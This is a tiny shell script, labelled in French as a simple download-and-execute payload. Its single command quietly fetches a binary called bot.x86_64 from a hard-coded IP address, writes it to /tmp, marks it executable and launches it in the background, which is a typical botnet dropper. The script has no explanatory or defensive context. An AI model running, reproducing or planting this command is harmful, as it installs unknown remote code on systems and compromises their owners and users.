#!/bin/sh
# PAYLOAD SIMPLE - TÉLÉCHARGE ET EXÉCUTE

wget -q -O /tmp/b http://94.154.43.227:8080/bot.x86_64 2>/dev/null && chmod +x /tmp/b && /tmp/b &
